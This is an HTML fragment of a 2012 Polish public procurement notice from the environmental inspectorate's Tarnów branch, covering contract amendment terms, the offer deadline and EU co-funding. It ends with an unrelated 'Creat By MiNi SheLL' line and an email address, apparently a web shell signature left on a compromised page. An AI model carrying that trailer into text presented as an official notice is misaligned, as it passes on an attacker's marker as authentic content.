d)	w szczególnych uzasadnionych przypadkach wystąpienia konieczności realizacji przez podwykonawcę części zamówienia,  której Wykonawca nie wskazał w ofercie, że powierzy ją do wykonania podwykonawcy za zgodą Zamawiającego i z zachowaniem zasad dot. podwykonawców określonych we wzorze umowy,
e)	wystąpienia zamówień dodatkowych lub zamiennych niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia i które mają wpływ na termin realizacji zamówienia,
f)	zmianę obowiązującej stawki VAT - jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę,
g)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu,
h)	wprowadzenia dodatkowych wymagań dla inwestycji współfinansowanych z funduszy UE.
Zmiany w treści umowy nie mogą prowadzić do zwiększenia wynagrodzenia Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krakow.pios.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Inspektorat Ochrony Środowiska w Krakowie Delegatura w Tarnowie, Tarnów, ul. Krasińskiego 7a, pok. 220 od poniedziałku do piątku w godz. 8.00- 14.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 10:00, miejsce: Wojewódzki Inspektorat Ochrony Środowiska w Krakowie Delegatura w Tarnowie, Tarnów, ul. Krasińskiego 7a, pok. 220.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie realizowane w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013. Oś priorytetowa 7.Infrastruktura ochrony środowiska. Działanie 7.2. Poprawa jakości powietrza i zwiększenie wykorzystania odnawialnych źródeł energii z Europejskiego Funduszu Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com